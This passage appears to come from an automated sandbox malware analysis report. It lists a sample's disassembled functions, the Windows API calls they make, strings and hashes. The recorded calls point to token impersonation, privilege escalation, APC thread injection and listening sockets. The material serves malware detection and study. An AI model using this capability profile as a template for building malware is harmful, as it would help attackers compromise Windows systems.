                                            • CreateProcessA.KERNEL32 ref: 007C1013
                                            • GetLastError.KERNEL32 ref: 007C101D
                                            • GetCurrentDirectoryW.KERNEL32 ref: 007C1374
                                            • GetCurrentDirectoryW.KERNEL32 ref: 007C1388
                                            • CreateProcessWithTokenW.ADVAPI32 ref: 007C13D1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateErrorLastProcess$ByteCharCurrentDirectoryMultiWide$TokenUserWith
                                            • String ID:
                                            • API String ID: 3044875250-0
                                            • Opcode ID: 1d990aa2536e0bdd41909587e15d765ca5c4192818fd4d96a304531b1bef1f0e
                                            • Instruction ID: 3d823781b2f7f9021bdf10c97184f0b170cab659cac6fac06d5267464f5e3b29
                                            • Opcode Fuzzy Hash: 1d990aa2536e0bdd41909587e15d765ca5c4192818fd4d96a304531b1bef1f0e
                                            • Instruction Fuzzy Hash: 5C61AB32608B84C2EB24DF61E884B6A73A5F749B84F50413DEA4D83B56DF7CC995CB40
                                            Function 007C9220 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 87fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • malloc.LIBCMT ref: 007C924F
                                              • Part of subcall function 007CF284: _FF_MSGBANNER.LIBCMT ref: 007CF2B4
                                              • Part of subcall function 007CF284: _NMSG_WRITE.LIBCMT ref: 007CF2BE
                                              • Part of subcall function 007CF284: HeapAlloc.KERNEL32 ref: 007CF2D9
                                              • Part of subcall function 007CF284: _callnewh.LIBCMT ref: 007CF2F2
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF2FD
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF308
                                            • _snprintf.LIBCMT ref: 007C9267
                                              • Part of subcall function 007CF63C: _errno.LIBCMT ref: 007CF673
                                              • Part of subcall function 007CF63C: _invalid_parameter_noinfo.LIBCMT ref: 007CF67E
                                            • FindFirstFileA.KERNEL32 ref: 007C9272
                                            • free.LIBCMT ref: 007C927E
                                              • Part of subcall function 007CF244: HeapFree.KERNEL32 ref: 007CF25A
                                              • Part of subcall function 007CF244: _errno.LIBCMT ref: 007CF264
                                              • Part of subcall function 007CF244: GetLastError.KERNEL32 ref: 007CF26C
                                            • malloc.LIBCMT ref: 007C92CE
                                            • _snprintf.LIBCMT ref: 007C92E6
                                            • free.LIBCMT ref: 007C930E
                                            • FindNextFileA.KERNEL32 ref: 007C9327
                                            • FindClose.KERNEL32 ref: 007C9338
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errno$Find$FileHeap_snprintffreemalloc$AllocCloseErrorFirstFreeLastNext_callnewh_invalid_parameter_noinfo
                                            • String ID: %s\*
                                            • API String ID: 2620626937-766152087
                                            • Opcode ID: cc893efac870e389c3214beb74474689fb7507946bb50414294d16208cc1c1d7
                                            • Instruction ID: f481e46aa712539eabfcca5ac375743c48f928ae57152d2dc09ec4fb2f06ae7b
                                            • Opcode Fuzzy Hash: cc893efac870e389c3214beb74474689fb7507946bb50414294d16208cc1c1d7
                                            • Instruction Fuzzy Hash: 2231C0123096C185EA159B63A818BA97B66734AFD0F88516DDFD917797CF3CE543C300
                                            Function 00401A70 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 50COMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlCaptureContext.KERNEL32 ref: 00401A84
                                            • RtlLookupFunctionEntry.KERNEL32 ref: 00401A9B
                                            • RtlVirtualUnwind.KERNEL32 ref: 00401ADD
                                            • SetUnhandledExceptionFilter.KERNEL32 ref: 00401B21
                                            • UnhandledExceptionFilter.KERNEL32 ref: 00401B2E
                                            • GetCurrentProcess.KERNEL32 ref: 00401B34
                                            • TerminateProcess.KERNEL32 ref: 00401B42
                                            • abort.MSVCRT ref: 00401B48
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2975793604.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2975749424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975833411.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975871835.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975941933.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975979762.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2976023864.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtualabort
                                            • String ID: @5E
                                            • API String ID: 4278921479-727458683
                                            • Opcode ID: 03ff3d805c6c5b31210b554aa0805c21f9c7c8b799266a99dd13c5c6293e079e
                                            • Instruction ID: d9c1a563eddaf3b5510b4e3cdc57f7cc7ddb545808ab7069b32be6ef691eb8bd
                                            • Opcode Fuzzy Hash: 03ff3d805c6c5b31210b554aa0805c21f9c7c8b799266a99dd13c5c6293e079e
                                            • Instruction Fuzzy Hash: A021E4B5601F55A6EB008F66FC8438A33B4B748BCAF500126EE4E5776AEF38C255C748
                                            Function 007C3A64 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 113sleepprocesslibraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleA.KERNEL32 ref: 007C3ACE
                                            • GetProcAddress.KERNEL32 ref: 007C3ADE
                                              • Part of subcall function 007C3984: malloc.LIBCMT ref: 007C39C2
                                              • Part of subcall function 007C3984: free.LIBCMT ref: 007C3A45
                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 007C3B10
                                            • Thread32Next.KERNEL32 ref: 007C3B7A
                                            • Sleep.KERNEL32 ref: 007C3B90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressCreateHandleModuleNextProcSleepSnapshotThread32Toolhelp32freemalloc
                                            • String ID: NtQueueApcThread$ntdll
                                            • API String ID: 1427994231-1374908105
                                            • Opcode ID: 4682eb5fa987184764bf2e500015da157d39ace14d4a97c914713ac55f463483
                                            • Instruction ID: dafb893c694cd0b7fd8575955e8994ba38ec09cd9558e8e225896361c485ac68
                                            • Opcode Fuzzy Hash: 4682eb5fa987184764bf2e500015da157d39ace14d4a97c914713ac55f463483
                                            • Instruction Fuzzy Hash: 16415A72705B4199EB20CF61E844B9D73A5BB48B88F54812DDE4D57B08EF3CCA45C740
                                            Function 007C6A78 Relevance: 9.1, APIs: 6, Instructions: 60networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: bindclosesockethtonsioctlsocketlistensocket
                                            • String ID:
                                            • API String ID: 1767165869-0
                                            • Opcode ID: f4b350054c05ef1cd9ff918b3eebb66b28a02a47d439b5acf83660ca504c3395
                                            • Instruction ID: 8463aa8492730acd8ce592735602a7bfa177aaddebcbd5c42ac32c52f3d388a4
                                            • Opcode Fuzzy Hash: f4b350054c05ef1cd9ff918b3eebb66b28a02a47d439b5acf83660ca504c3395
                                            • Instruction Fuzzy Hash: 2F11007170879882DB248F16E49071DB7A0F788FA4F98867DDE5A537A4CF7CE84A8700
                                            Function 007C6670 Relevance: 9.1, APIs: 6, Instructions: 57networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: bindclosesockethtonlhtonsioctlsocketsocket
                                            • String ID:
                                            • API String ID: 3910169428-0
                                            • Opcode ID: b53a2f792c81892d7b6d7ca8ab412e3f2e468a0ee1017cf91dd071cea0dc5194
                                            • Instruction ID: 2d95fecc788881a661305e29bf2ba6dfbd5b18fd079b5f6b5482afd0846764c3
                                            • Opcode Fuzzy Hash: b53a2f792c81892d7b6d7ca8ab412e3f2e468a0ee1017cf91dd071cea0dc5194
                                            • Instruction Fuzzy Hash: 3C11EE36725B8482D7249F21E8587993720F788BA4F504279CE2A433A1DF3CD95AC700
                                            Function 007CDF50 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 007CDCC0: RevertToSelf.ADVAPI32 ref: 007CDCDD
                                            • LogonUserA.ADVAPI32 ref: 007CDF98
                                            • GetLastError.KERNEL32 ref: 007CDFA2
                                              • Part of subcall function 007C5FEC: malloc.LIBCMT ref: 007C6008
                                              • Part of subcall function 007BFE54: MultiByteToWideChar.KERNEL32 ref: 007BFE81
                                              • Part of subcall function 007BFE54: MultiByteToWideChar.KERNEL32 ref: 007BFEA9
                                              • Part of subcall function 007BD044: malloc.LIBCMT ref: 007BD057
                                            • ImpersonateLoggedOnUser.ADVAPI32 ref: 007CDFC0
                                            • GetLastError.KERNEL32 ref: 007CDFCA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ByteCharErrorLastMultiUserWidemalloc$ImpersonateLoggedLogonRevertSelf
                                            • String ID: %s\%s
                                            • API String ID: 3621627092-4073750446
                                            • Opcode ID: 21501fd99f5b763e027db7a7b361eaf12fbcf34ba50608c9b89ed7353f562f62
                                            • Instruction ID: 6da34dfa5c685c891bfaa0d2e662eaf862ef995ac276b57521b62fc38afa69d9
                                            • Opcode Fuzzy Hash: 21501fd99f5b763e027db7a7b361eaf12fbcf34ba50608c9b89ed7353f562f62
                                            • Instruction Fuzzy Hash: 2A314F20B18B45C2EB20EB62F89976A23A6F789BC0F54403DEA4E47756DF3CD945C740
                                            Function 007BFA1C Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CountSleepTick$closesocket
                                            • String ID:
                                            • API String ID: 2363407838-0
                                            • Opcode ID: 10e278be78da8f1e85a2fadd26c76492043cbdbeff7cfa22a85522b80d216db2
                                            • Instruction ID: 12bfdea8b90f90c7b5ccf10a087c38fdd114f709100a0e431d2201587e4bd6bf
                                            • Opcode Fuzzy Hash: 10e278be78da8f1e85a2fadd26c76492043cbdbeff7cfa22a85522b80d216db2
                                            • Instruction Fuzzy Hash: 96119621704684C2DA10EB22F8597596360B789BB0F544735EEBE47BE6DE3CC5458741
                                            Function 00401990 Relevance: 7.6, APIs: 5, Instructions: 56timethreadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetSystemTimeAsFileTime.KERNEL32 ref: 004019D5
                                            • GetCurrentProcessId.KERNEL32 ref: 004019E0
                                            • GetCurrentThreadId.KERNEL32 ref: 004019E8
                                            • GetTickCount.KERNEL32 ref: 004019F0
                                            • QueryPerformanceCounter.KERNEL32 ref: 004019FE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2975793604.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2975749424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975833411.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975871835.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975941933.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975979762.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2976023864.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                            • String ID:
                                            • API String ID: 1445889803-0
                                            • Opcode ID: 50bcba46724f9b704bab53f94a1f403ca93275f12098583a90ed55ecc7962461
                                            • Instruction ID: e7f875539d2b8dca624fb493ee906b0c7b4db546ccc53074c796ddc42d9a9937
                                            • Opcode Fuzzy Hash: 50bcba46724f9b704bab53f94a1f403ca93275f12098583a90ed55ecc7962461
                                            • Instruction Fuzzy Hash: 09115EA6756B1482FB109B65FC0431973A0B788BF5F081671AE9D47BA4DE3CC589D708
                                            Function 007CEE8C Relevance: 7.6, APIs: 5, Instructions: 53networkCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: bindclosesockethtonslistensocket
                                            • String ID:
                                            • API String ID: 564772725-0
                                            • Opcode ID: be1f698a7e4eb4207d6933216863c257059b8865fc596cd8fbc22c7be6d18c17
                                            • Instruction ID: 09e37a74339a78084a944dc0ad3f3bf8344a542eb0d4d0bf318f68f4c7d17e48
                                            • Opcode Fuzzy Hash: be1f698a7e4eb4207d6933216863c257059b8865fc596cd8fbc22c7be6d18c17
                                            • Instruction Fuzzy Hash: 00110835618798C2EA24AF11E81571AB360F788FE0F44476DEE9947BA4CF7CD5058704
                                            Function 007BD83C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 135COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: %s!%s
                                            • API String ID: 0-2935588013
                                            • Opcode ID: 2575759d0ae14333fa4d595125301f6413fce9519f9dbc799c601f61bbf3305b
                                            • Instruction ID: c42a10603597eb65e1a4646ba455f14b1a0127e8f4b6f175fb872722745a3cd2
                                            • Opcode Fuzzy Hash: 2575759d0ae14333fa4d595125301f6413fce9519f9dbc799c601f61bbf3305b
                                            • Instruction Fuzzy Hash: 05514676205680C6DB34AF66D4447E97361F789B98F948026EF8A57748EB3CED82CB04
                                            Function 007C0B70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                            Download Yara Rule
                                            APIs
                                            • LookupPrivilegeValueA.ADVAPI32 ref: 007C0BEA
                                            • AdjustTokenPrivileges.ADVAPI32 ref: 007C0C1A
                                            • GetLastError.KERNEL32 ref: 007C0C24
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                            • String ID: %s
                                            • API String ID: 4244140340-620797490
                                            • Opcode ID: bf812f175a1fbc479699b50877281c9aa9b2d5b741073a8283bc0e57be89c079
                                            • Instruction ID: bb615955f9b21ad6a9fa2d1a6f3f61ca6a5a5ec412e6a723fab3e69bbacc8dda
                                            • Opcode Fuzzy Hash: bf812f175a1fbc479699b50877281c9aa9b2d5b741073a8283bc0e57be89c079
                                            • Instruction Fuzzy Hash: A6216B72B00B44DAEB14DFA5D448BEC33B5F758B88F44455A8E4C93A49EF78C615C380
                                            Function 007C5854 Relevance: 6.1, APIs: 4, Instructions: 73sleepnetworkCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetTickCount.KERNEL32 ref: 007C587B
                                            • Sleep.KERNEL32 ref: 007C58CA
                                            • GetTickCount.KERNEL32 ref: 007C58D0
                                            • WSAGetLastError.WS2_32 ref: 007C58DA
                                              • Part of subcall function 007C5A20: ioctlsocket.WS2_32 ref: 007C5A42
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CountTick$ErrorLastSleepioctlsocket
                                            • String ID:
                                            • API String ID: 1121440892-0
                                            • Opcode ID: 7368cb6fa517e1a070c78e6e07bfa46b364e9fef9c30544ba018e77da25e9e41
                                            • Instruction ID: 054467d323e36cce02eb180a72a40793fc18fed136aafd4b618d6b5eb0f281e1
                                            • Opcode Fuzzy Hash: 7368cb6fa517e1a070c78e6e07bfa46b364e9fef9c30544ba018e77da25e9e41
                                            • Instruction Fuzzy Hash: BC318836B00F40C6DB00DBA2E8847AC33B9F388B90F51462ADE5E93B95DE39C556C340
                                            Function 0078B7B0 Relevance: 5.9, Strings: 4, Instructions: 884COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: $<$ailure #%d - %s$e '
                                            • API String ID: 0-963976815
                                            • Opcode ID: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
                                            • Instruction ID: 287bb5dc15f92eb6a27f88c67edb15b167955f2ef760f6903e2caa1b01a9c48e
                                            • Opcode Fuzzy Hash: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
                                            • Instruction Fuzzy Hash: D992D2B2729A8087DB58CB1DE4A173AB7A1F3C8B84F44512AE79B87794CE3CD551CB04
                                            Function 007BDA3C Relevance: 4.9, APIs: 3, Instructions: 374memoryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 007C6114: htonl.WS2_32 ref: 007C6131
                                            • GetLastError.KERNEL32 ref: 007BDD33
                                              • Part of subcall function 007CCC00: GetCurrentProcess.KERNEL32 ref: 007CCC8D
                                            • HeapCreate.KERNEL32 ref: 007BDCDA
                                            • HeapAlloc.KERNEL32 ref: 007BDCF8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocCreateCurrentErrorLastProcesshtonl
                                            • String ID:
                                            • API String ID: 3419463915-0
                                            • Opcode ID: ec0623d855ca9fea6adc12097b57476b8ed8efbce5d3b57090cc4cf496277255
                                            • Instruction ID: 93d0b362698dc65198dd26153f504d09491addcac283598cc59bf01dd77d395c
                                            • Opcode Fuzzy Hash: ec0623d855ca9fea6adc12097b57476b8ed8efbce5d3b57090cc4cf496277255
                                            • Instruction Fuzzy Hash: 91E180B2B10B4187EB34CB25E8457AA63A1F758794F498139DB8E97B51EF3CE546C300
                                            Function 00402314 Relevance: 4.6, APIs: 3, Instructions: 75COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2975793604.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2975749424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975833411.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975871835.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975941933.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975979762.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2976023864.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: signal
                                            • String ID:
                                            • API String ID: 1946981877-0
                                            • Opcode ID: 06a55dde90fdba465f035aded498aa017c2ec9da3ac7fa2f421ff76a62bbfb83
                                            • Instruction ID: e5ed25f9ec93a45af181b237418324cd8bf01173fb15efddcc2dfe5e442f875f
                                            • Opcode Fuzzy Hash: 06a55dde90fdba465f035aded498aa017c2ec9da3ac7fa2f421ff76a62bbfb83
                                            • Instruction Fuzzy Hash: D311D06672101043FB38273AC79EB2F0002A746349F9964378E0CA3BD4C9BECD814A4E
                                            Function 007DC3B0 Relevance: 3.4, Strings: 2, Instructions: 884COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: $<
                                            • API String ID: 0-428540627
                                            • Opcode ID: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
                                            • Instruction ID: 764ba36438ddbfa5b374a828860b47549608d60170feb15afc7fa45b4a66b4f8
                                            • Opcode Fuzzy Hash: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
                                            • Instruction Fuzzy Hash: B192D2B2329A8087DB58CB1DE4A173AB7A1F3C8B84F54512AE79B87794CE3CD551CB04
                                            Function 0078C397 Relevance: 2.6, Strings: 2, Instructions: 134COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: ailure #%d - %s$e '
                                            • API String ID: 0-4163927988
                                            • Opcode ID: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
                                            • Instruction ID: e1706d56677bb057c981e47d043df2ff32cb694e235f17486001f4deff54be51
                                            • Opcode Fuzzy Hash: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
                                            • Instruction Fuzzy Hash: 4F510CB66146508BDB14CB0DE49072AB7E1F3CCBD4F84421AE38E87768DA3CE545CB40
                                            Function 007B2B78 Relevance: 2.6, Strings: 1, Instructions: 1301COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: ZKv
                                            • API String ID: 0-880881843
                                            • Opcode ID: 44dbdca5de95d3eaf9b7d49d0edc22ffb8019ee4fe60ed2664d653dd49dc1cfb
                                            • Instruction ID: 2a181d2e14a1a88544c322f0ad303eb1070d9a9e35df0120ad7924d8458b6be2
                                            • Opcode Fuzzy Hash: 44dbdca5de95d3eaf9b7d49d0edc22ffb8019ee4fe60ed2664d653dd49dc1cfb
                                            • Instruction Fuzzy Hash: CA82C363B3412007979CCA3DAC66BBA65D3B39824C748D83DF907E7B85E93CDD858642
                                            Function 007B2BC8 Relevance: 2.5, Strings: 1, Instructions: 1272COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: ZKv
                                            • API String ID: 0-880881843
                                            • Opcode ID: 428fdd8f08157c70c6bee6c515a6aeac3f5977cd79cbeff5cfb85819bc96fc47
                                            • Instruction ID: 998e34d6a21102c35338c97d18f46532a6f7fcecb394867027eb07630216d97f
                                            • Opcode Fuzzy Hash: 428fdd8f08157c70c6bee6c515a6aeac3f5977cd79cbeff5cfb85819bc96fc47
                                            • Instruction Fuzzy Hash: 7072C363B3412007979CCA3DAC66BBB65D2B39824C748D83DF907E7B85E93CDD858642
                                            Function 007B2BD8 Relevance: 2.5, Strings: 1, Instructions: 1267COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: ZKv
                                            • API String ID: 0-880881843
                                            • Opcode ID: 6977b27e957431aa8c8a8a3fd57c7c390198a42e114092472595096a235b4a8e
                                            • Instruction ID: 9f05d420ddb39963c3678ac93820a123d6d70fb7779f153124e74bd8970e6b9e
                                            • Opcode Fuzzy Hash: 6977b27e957431aa8c8a8a3fd57c7c390198a42e114092472595096a235b4a8e
                                            • Instruction Fuzzy Hash: 2C72D263B3412007979CCA3DAC66BBA65D3B39824C748D83DF907E7B85E93CDD858642
                                            Function 007B2C08 Relevance: 2.5, Strings: 1, Instructions: 1249COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                            • Associated: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: ZKv
                                            • API String ID: 0-880881843
                                            • Opcode ID: 1f55c0f74a8389cab10b05f8ae5150c20525da16fdce7c033b22cfe67e16ea59
                                            • Instruction ID: ae7fb46f9dd5dbb955ab8fad231229c879c96ad5f832fa30d0057f2039bf0f88
                                            • Opcode Fuzzy Hash: 1f55c0f74a8389cab10b05f8ae5150c20525da16fdce7c033b22cfe67e16ea59
                                            • Instruction Fuzzy Hash: 0972D363B3412007979CCA3DAC66BBA65D3B39824C748D83DF907E7B85E93CDD858642
                                            Function 007B2C40 Relevance: 2.5, Strings: 1, Instructions: 1230COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
